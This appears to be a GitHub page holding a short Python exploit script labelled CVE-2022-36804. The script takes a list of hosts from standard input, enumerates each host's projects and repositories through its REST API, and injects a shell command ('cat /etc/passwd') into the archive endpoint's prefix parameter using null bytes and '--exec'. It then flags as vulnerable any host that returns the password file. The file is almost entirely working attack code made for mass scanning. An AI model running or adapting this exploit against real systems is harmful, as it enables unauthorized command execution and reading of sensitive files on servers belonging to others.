-
Notifications
You must be signed in to change notification settings - Fork 2
/
cve-2022-36804.py
42 lines (34 loc) · 1.52 KB
/
cve-2022-36804.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import requests
import urllib3
import sys
urllib3.disable_warnings()
def run(target):
try:
projects_response = requests.get("https://"+target+"/rest/api/latest/projects", verify=False).json()["values"]
command = "cat%20/etc/passwd"
for item in projects_response:
project = item["key"]
repos_response = requests.get(
f"https://" + target + f"/rest/api/latest/projects/{project}/repos", verify=False).json()["values"]
repos = [item["slug"] for item in repos_response]
for repo in repos:
if check(target, project, repo):
return "\033[92m[+] VULNERABLE | " + target + " | https://" + target + "/rest/api/latest/projects/" + project + "/repos/" + repo + f"/archive?filename=aaa&path=aaa&prefix=ax%00--exec=%60{command}%60%00--remote=origin \033[0m"
return "[-] NOT-VULNERABLE | " + target
except:
return "[-] NOT-VULNERABLE | " + target
def check(target, project, repo):
try:
command = "cat%20/etc/passwd"
response = requests.get(
"https://" + target + "/rest/api/latest/projects/" + project + "/repos/" + repo +
f"/archive?filename=aaa&path=aaa&prefix=ax%00--exec=%60{command}%60%00--remote=origin", verify=False)
resp_json = response.json()
return "root:x" in resp_json["errors"][0]["message"]
except:
return False
def main():
for target in sys.stdin:
print(run(target.strip()))
if __name__ == "__main__":
main()